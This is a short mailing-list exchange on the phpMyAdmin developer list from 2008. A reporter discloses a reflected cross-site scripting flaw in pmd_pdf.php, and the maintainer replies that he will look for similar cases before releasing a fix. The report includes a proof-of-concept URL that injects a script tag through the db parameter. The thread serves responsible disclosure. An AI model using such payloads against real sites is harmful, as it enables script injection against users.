Re: [Phpmyadmin-devel] XSS in current phpmyadmin versions

29 Oct 2008


      Fabian Fingerle a écrit :
...
Hi,
Exploit :
register_globals=on,off
loged in ....
query :
http://localhost/pmd_pdf.php?db=%3E%22%3E<script>alert(1)</script>
Could you fix this quickly?
Yours
 Fabian
Hi,
The reference for this is http://www.securityfocus.com/bid/31928/info
and someone told me about this yesterday (the team was not pre-informed
about this problem).
Before releasing a "quick fix" I want to ensure there are no similar
cases lurking around.
Marc Delisle

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

2005

2004

2003

2002

2001

Re: [Phpmyadmin-devel] XSS in current phpmyadmin versions